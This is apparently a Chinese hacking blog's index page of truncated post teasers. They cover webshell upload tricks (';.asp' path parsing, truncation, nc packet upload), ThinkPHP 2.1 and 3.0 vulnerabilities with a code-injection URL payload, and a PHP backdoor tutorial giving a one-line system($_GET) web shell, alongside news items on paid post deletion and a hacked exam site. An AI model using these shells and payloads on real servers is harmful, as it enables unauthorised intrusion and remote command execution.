丢掉NC,介绍一种新的上传shell文件的方法

 今日低调在知道区发帖求助,说后台地址,用户名和密码都有,拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单就是本地上传,修改action的地址为上传页面并且在路径后面加上*.asp;或者加个.也行。就不多做介绍。ljb17的方法是抓包,利用nc上传。 他这里路径有2种办法,第一个办法是和上面一样,添加*.asp; 第二种办法就是截断,直接在路径后...

- 阅读全文 -

ThinkPHP 2.1 漏洞可拿webshell

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈 晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我 我看了下  系统还是以前的那个think...

- 阅读全文 -

删除、恢复wscript.shell

由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。   恢复wscript.shell   建议如果真的为了安全一定要删除这些!   下面给出卸载和删除的方法   卸载wscript.shell对象,在cmd下或直接运行:regsvr3...

- 阅读全文 -

网站内鬼删帖 年收数万好处费

近日,百度三名员工因参与“有偿删帖”,被警方以“涉嫌非国家工作人员受贿罪”刑拘。昨日,记者从北京市公安局获悉,警方已针对此事成立专案组,正在进一步调查。有消息称,不止百度一家公司员工被刑拘,“有偿删帖”涉及多家公司。但该说法未获得警方证实。 记者调查发现,大批网络公关公司靠“有偿删帖”牟利,与全国多数知名网站(论坛)工作人员、版主等相互勾结,与有需要的地方政府部门、企业和个人进行灰色交易。 ■ 暗...

- 阅读全文 -

thinkphp 3.0 爆路径漏洞

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。 检测有两种情况 1. 可执行命令,这个估计是伪3.0版本? 交大定票 此站到可以执行命令 http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 可查看版本 http://webshell.cc/index.php/module...

- 阅读全文 -

广东人事考试局网站被黑 黑客称500元可改成绩

南都讯 记者张钊 刘倩 实习生李逸凡 前天晚上,广东省人事考试局网站被黑,“网上咨询”栏目上被黑客用来“做广告”,黑客私下声称,只要考生缴纳500元钱,就能帮助改动成绩。昨日,省人事考试局表示,黑客只是盗取了“网上咨询”栏目的账号和密码,但成绩数据库并未受到攻击,黑客自称能够改动成绩是个骗局。 黑客称汇款就能帮改成绩 昨日,有登录人事考试局网站的考生发现,主页上“网上咨询”栏目,几乎所有网友所提问...

- 阅读全文 -

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET['input']); ?> http://192.168.247.133:81/shell.php?input=dir &nbs...

- 阅读全文 -